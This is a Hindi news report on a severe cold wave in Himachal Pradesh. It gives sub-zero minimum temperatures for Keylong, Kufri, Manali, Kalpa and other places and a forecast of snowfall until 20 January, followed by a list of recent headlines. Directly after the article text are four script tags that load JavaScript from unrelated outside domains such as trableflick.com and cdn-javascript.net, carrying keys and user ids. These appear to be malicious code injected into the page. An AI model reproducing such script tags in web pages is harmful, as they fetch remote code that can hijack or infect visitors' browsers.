Categories: हिमाचल

हिमाचल में शीतलहर का प्रकोप जारी, पांच जिलों का माइनस में पारा

<p>हिमाचल प्रदेश में भीषण सर्दी का प्रकोप जारी है। राजधानी शिमला और अन्य पर्वतीय इलाकों में मंगलवार को बारिश और बर्फबारी का सिलसिला थमा रहा। हालांकि सर्द हवाओं के चलते कड़ाके की ठंड पड़ रही है। बर्फबारी वाले इलाकों में लोगों को हाड़कंपाती ठंड से राहत नहीं मिली। बर्फ की सफेद चादर बिछी होने के साथ ही सर्द हवाएं चलने के कारण लोग घरों में कैद रहे।</p>

<p>राज्य के पांच जिलों लाहौल-स्पीति, किन्नौर, शिमला, कुल्लू और चंबा जिलों का पारा शून्य से नीचे चला गया है। शिमला से सटा पर्यटन स्थल कुफरी में कल्पा और मनाली से भी ज्यादा ठंड पड़ी। शिमला का पारा भी शून्य से करीब पहुंच गया है। मौसम विभाग के पूर्वानुमान के मुताबिक आगामी 20 जनवरी तक मौसम के तेवर कड़े रहने से शीतलहर से निजात नहीं मिलेगी। लाहौल-स्पीति का मुख्यालय केलंग राज्य में सबसे ठंडा स्थल रहां, जहां न्यूनतम तापमान -5 डिग्री सेल्सियस रिकॉर्ड किया गया। कुफरी दूसरा सबसे ठंडा क्षेत्र रहा और वहां तापमान -2 डिग्री सेल्सियस रहा।</p>

<p>इसके अलावा कुल्लू के विख्यात पर्यटन स्थल मनाली में -1.6 डिग्री, किन्नौर के कल्पा में -1.2 डिग्री और चंबा के डल्हौजी में -0.2 डिग्री सेल्सियस दर्ज हुआ। राजधानी शिमला में न्यूनतम तापमान 1.3 डिग्री रहा, जो कि एक रात पहले 7.4 डिग्री सेल्सियस था। पालपमुर में तापमान 2 डिग्री, धर्मशाला में 2.2 डिग्री, भुंतर में 3.3 डिग्री, चंबा में 6 डिग्री, सुंदरनगर में 6.3 डिग्री, कांगड़ा में 6.5 डिग्री, सोलन में 7 डिग्री, मंडी में 7.3 डिग्री, हमीरपुर में 8.6 डिग्री, बिलासपुर में 9 डिग्री व उना में 9.3 डिग्री सेल्सियस दर्ज किया गया।</p>

<p>मौसम विज्ञान केंद्र शिमला के निदेशक मनमोहन सिंह ने बताया कि पश्चिमी विक्षोभ अभी सक्रिय बना हुआ है। इससे कई जगह बारिश और बर्फबारी होने का अनुमान है। मैदानी क्षेत्रों में 18 जनवरी तक बारिश जबकि पर्वतीय इलाकों में 20 जनवरी तक बर्फबारी की संभावना जताई है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1579060759137″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

“JOA IT पदों पर चयनित उम्मीदवारों की सूची जारी, इतने को मिली नियुक्ति”

  Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…

5 hours ago

अतिक्रमण एक रात का नहीं, सुक्खू सरकार से पहले हुआ अवैध निर्माण: कुलदीप

  Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…

5 hours ago

मुख्यमंत्री के निर्देश पर हमीरपुर में ‘कायाकल्प’ अभियान से बदल रही है शहर की तस्वीर

  Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…

6 hours ago

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

6 hours ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

7 hours ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

7 hours ago